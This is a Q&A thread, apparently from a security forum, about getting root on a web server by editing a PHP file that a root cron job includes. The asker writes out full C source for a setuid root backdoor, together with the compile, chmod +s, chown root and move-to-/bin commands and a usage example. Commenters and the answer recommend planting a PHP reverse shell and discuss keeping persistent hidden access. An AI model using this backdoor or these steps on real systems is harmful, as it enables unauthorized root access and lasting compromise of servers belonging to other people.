1

There is a cron job running as root on a web server every 15 minutes:

php cli-script.php

(cli stands for "Command Line Interface", so is only accessible from command-line)

It is not possible to directly modify the PHP script cli-script.php. Hower it includes another PHP script db.php which can be directly modifed as www user:

cli-script.php:

include "db.php";
...

My exploitation technique:

  1. Modify db.php - add system() command since db.php inherits root's privileges from cron job's script, but can be edited as www-user (db.php is Writable, Readable and Executable as www user). Run all initial commands through system()
  2. Create binary wrapper backdoor for easier further exploitation. We need to set UID to zero (root) to be able to use shells like bash/sh (SUID not used after exploit) (another way would be to use e.g. perl/python scripts)

db.php

...
system("...");
...

backdoor.c:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

int main(int argc, char *argv[]) {
    if (argc == 2) {
        setuid(0); // otherwise /bin/sh would use real UID
        system(argv[1]);
    } else {
        printf("1 argument expected");
    }
    return 0;
}

Detailed steps:

  1. Compile C-code as www-user: gcc backdoor.c -o backdoor
  2. Put sticky bit + change file owner as root: chmod +s backdoor && chown root backdoor
  3. Put binary into /bin/ directory as root: mv backdoor /bin/backdoor
  4. Usage (execute as www-user): backdoor "whoami" => root

Question: Is there any simpler way to exploit such vulnerability and I'm just overcomplicating everything?

Awaaaaarghhh
  • 562
  • 2
  • 18
  • 1
    Then I guess I misunderstood. In that case the answer is simple: no, there really isn't anything simpler. Other than @gowenfawr's answer, which is what I would do - drop in a reverse shell. Otherwise though there really isn't anywhere to cut any corners. You can't modify cron, you can't edit the `cli-script.php`. Editing the file it includes which you do have access to is the only option. – Conor Mancone Aug 08 '19 at 19:55
  • @Conor Mancone yes, that makes sense. so i will accept gowenfawr answer. but i think that such binary wrapper is more persistent rather than php reverse shell which was loaded into memory. it's about quality of a backdoor. – Awaaaaarghhh Aug 08 '19 at 20:01
  • That's a bit of a different question. You asked about exploiting a cron job. Dropping in a shell is the best way to go. If you're interested in persistence then neither your backdoor nor gowenfawr's answer is ideal, because neither give you a way to get back in once kicked out. However, either method would then allow you to drop in an actual hidden backdoor. – Conor Mancone Aug 08 '19 at 20:11

1 Answers1

4

Is there any simpler way to exploit such vulnerability

It would be more straightforward to simply integrate a PHP reverse shell into the db.php file; once it runs and connects to your listener, you'll be given shell-like access as root.

gowenfawr
  • 71,975
  • 17
  • 161
  • 198